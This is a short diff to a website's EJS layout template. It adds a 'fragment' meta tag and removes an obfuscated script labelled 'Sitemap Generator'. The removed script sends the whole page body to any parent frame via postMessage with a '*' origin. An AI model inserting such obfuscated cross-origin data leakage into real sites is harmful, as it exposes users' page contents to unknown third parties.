--- a/views/layout.ejs
+++ b/views/layout.ejs
@@ -14,6 +14,7 @@
         <meta name="superfish" content="nofish">
         <meta name="robots" content="index, follow">
         <meta name="revisit-after" content="1 Day">
+        <meta name="fragment" content="!" />
         <link rel="canonical" href="https://www.voetr.com" />
         <!--META TAGS END-->        
 
@@ -55,10 +56,7 @@
           ga('send', 'pageview');
         </script>
         <!--ANALYTICS END-->
-        <!-- Sitemap Generator -->
-        <script type="text/javascript">
-          var _0xaea9=["sitemapgenerator:: ","innerHTML","body","document","stringify","*","postMessage","setTimeout"];window[_0xaea9[7]](function(){parent[_0xaea9[6]](_0xaea9[0]+JSON[_0xaea9[4]](window[_0xaea9[3]][_0xaea9[2]][_0xaea9[1]]),_0xaea9[5])},3000);
-        </script>
+
     </head>
     <body>
 
